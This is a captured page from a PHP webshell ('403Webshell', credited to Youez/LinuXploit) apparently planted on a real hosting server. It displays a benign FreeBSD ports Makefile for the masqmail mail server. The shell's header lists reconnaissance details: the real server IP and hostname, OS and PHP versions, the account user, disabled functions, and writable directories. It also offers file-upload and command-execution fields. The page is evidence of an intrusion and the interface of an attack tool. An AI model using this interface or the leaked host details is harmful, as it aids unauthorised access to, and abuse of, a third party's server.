403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/mail/masqmail/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/mail/masqmail/Makefile
PORTNAME=	masqmail
PORTVERSION=	0.3.5
CATEGORIES=	mail
MASTER_SITES=	http://marmaro.de/prog/masqmail/files/

MAINTAINER=	bofh@FreeBSD.org
COMMENT=	Mail server for hosts, not permanently connected to the internet
WWW=		http://marmaro.de/prog/masqmail/

LICENSE=	GPLv2

USE_GNOME=	glib20
USES=		cpe gnome pkgconfig
USE_RC_SUBR=	masqmail
GNU_CONFIGURE=	yes
CFLAGS+=	-Wno-trigraphs
CONFIGURE_ARGS=	--with-user=mailnull --with-group=mail \
		--with-confdir=${ETCDIR} --with-logdir=/var/log/masqmail
CPE_VENDOR=	marmaro

OPTIONS_DEFINE=	RESOLVER AUTH DEBUG DOCS
OPTIONS_DEFAULT=	RESOLVER AUTH
RESOLVER_DESC=	Resolver
AUTH_DESC=	SMTP AUTH (RFC2554) support

AUTH_CONFIGURE_ENABLE=	auth
DEBUG_CONFIGURE_ENABLE=	debug
RESOLVER_CONFIGURE_ENABLE=	resolver

post-patch:
	@${REINPLACE_CMD} -e '/sed.*SENDMAIL/ s|$$(DESTDIR)||' ${WRKSRC}/Makefile.in

post-install:
	${MKDIR} ${STAGEDIR}${ETCDIR}
	${INSTALL_DATA} ${WRKSRC}/examples/masqmail.conf ${STAGEDIR}${ETCDIR}/masqmail.conf.sample
	${INSTALL_DATA} ${WRKSRC}/examples/example.route ${STAGEDIR}${ETCDIR}/masqmail.route.sample
	${INSTALL_DATA} ${WRKSRC}/examples/localnet.route ${STAGEDIR}${ETCDIR}/localnet.route.sample
	${INSTALL_DATA} ${WRKSRC}/examples/openssl.route ${STAGEDIR}${ETCDIR}/openssl.route.sample
	${MKDIR} ${STAGEDIR}${DOCSDIR}/docs
	cd ${WRKSRC} && ${CP} ChangeLog NEWS AUTHORS COPYING README TODO INSTALL THANKS ${STAGEDIR}${DOCSDIR}
	cd ${WRKSRC}/docs/ && ${COPYTREE_SHARE} . ${STAGEDIR}${DOCSDIR}/docs/

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit